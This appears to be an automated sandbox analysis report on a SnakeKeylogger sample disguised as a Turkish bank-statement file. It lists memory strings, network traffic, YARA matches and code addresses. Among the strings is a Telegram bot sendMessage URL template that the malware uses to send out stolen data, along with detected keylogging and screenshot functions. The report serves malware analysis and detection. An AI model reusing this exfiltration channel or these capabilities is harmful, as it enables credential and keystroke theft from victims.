Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002CCA000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175$
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large strings

Source: Hesap_Hareketleri_09122024_html.exe, Form1.cs	Long String: Length: 166868
Source: EfgRyiVrT.exe.1.dr, Form1.cs	Long String: Length: 166868

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_00D44218	1_2_00D44218
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_00D46F92	1_2_00D46F92
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_00D4D424	1_2_00D4D424
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F324F0	1_2_06F324F0
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F3AC28	1_2_06F3AC28
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F32D60	1_2_06F32D60
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F35260	1_2_06F35260
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F34168	1_2_06F34168
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F34158	1_2_06F34158
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F32928	1_2_06F32928
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 1_2_06F32919	1_2_06F32919
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DC147	9_2_012DC147
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D5362	9_2_012D5362
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DD278	9_2_012DD278
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DC468	9_2_012DC468
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DC738	9_2_012DC738
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D69A0	9_2_012D69A0
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DE988	9_2_012DE988
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DCA08	9_2_012DCA08
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D9DE0	9_2_012D9DE0
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DCCD8	9_2_012DCCD8
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DCFA9	9_2_012DCFA9
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D6FC8	9_2_012D6FC8
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D3E09	9_2_012D3E09
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DF631	9_2_012DF631
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DE97B	9_2_012DE97B
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D29E0	9_2_012D29E0
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012DFA88	9_2_012DFA88
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_01754218	10_2_01754218
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_01756F92	10_2_01756F92
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_0175D424	10_2_0175D424
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_074C0FE8	10_2_074C0FE8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_074C0FF8	10_2_074C0FF8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D9EE8	10_2_075D9EE8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D2D60	10_2_075D2D60
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D24F0	10_2_075D24F0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D5260	10_2_075D5260
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D4158	10_2_075D4158
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D4168	10_2_075D4168
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D2928	10_2_075D2928
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4D278	14_2_02A4D278
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A45362	14_2_02A45362
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4A088	14_2_02A4A088
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A47118	14_2_02A47118
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4C146	14_2_02A4C146
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4C738	14_2_02A4C738
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4C468	14_2_02A4C468
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4CA08	14_2_02A4CA08
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A469A0	14_2_02A469A0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4E988	14_2_02A4E988
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4CFAB	14_2_02A4CFAB
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4CCD8	14_2_02A4CCD8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4F631	14_2_02A4F631
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4FA88	14_2_02A4FA88
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A43A91	14_2_02A43A91
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A429EC	14_2_02A429EC
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A4E97B	14_2_02A4E97B
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_02A43E09	14_2_02A43E09
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C1E80	14_2_068C1E80
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C17A0	14_2_068C17A0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C0B30	14_2_068C0B30
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C9C18	14_2_068C9C18
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C5028	14_2_068C5028
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C9548	14_2_068C9548
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C2968	14_2_068C2968
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CE6AB	14_2_068CE6AB
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CE6B0	14_2_068CE6B0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CEAF8	14_2_068CEAF8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CDE00	14_2_068CDE00
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CE24B	14_2_068CE24B
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CE258	14_2_068CE258
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C1E70	14_2_068C1E70
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C178F	14_2_068C178F
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C8B90	14_2_068C8B90
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CF3A8	14_2_068CF3A8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C8BA0	14_2_068C8BA0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CF3B8	14_2_068CF3B8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CEB08	14_2_068CEB08
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C9328	14_2_068C9328
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C0B20	14_2_068C0B20
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CEF51	14_2_068CEF51
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CEF60	14_2_068CEF60
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CCC8F	14_2_068CCC8F
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CCCA0	14_2_068CCCA0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CD0F8	14_2_068CD0F8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C0007	14_2_068C0007
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CF803	14_2_068CF803
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C5018	14_2_068C5018
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CF810	14_2_068CF810
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C0040	14_2_068C0040
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CFC5F	14_2_068CFC5F
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CFC68	14_2_068CFC68
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CD9A8	14_2_068CD9A8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CD9A3	14_2_068CD9A3
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CDDF3	14_2_068CDDF3
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CD540	14_2_068CD540
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068C295B	14_2_068C295B
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 14_2_068CD550	14_2_068CD550

Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2387655535.00000000054C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2391112243.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000000.2329428830.0000000000592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejXEBK.exe> vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2389366437.0000000006DC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejXEBK.exe> vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2380496640.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2379243724.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791772673.0000000000BB7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Hesap_Hareketleri_09122024_html.exe
Source: Hesap_Hareketleri_09122024_html.exe	Binary or memory string: OriginalFilenamejXEBK.exe> vs Hesap_Hareketleri_09122024_html.exe

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
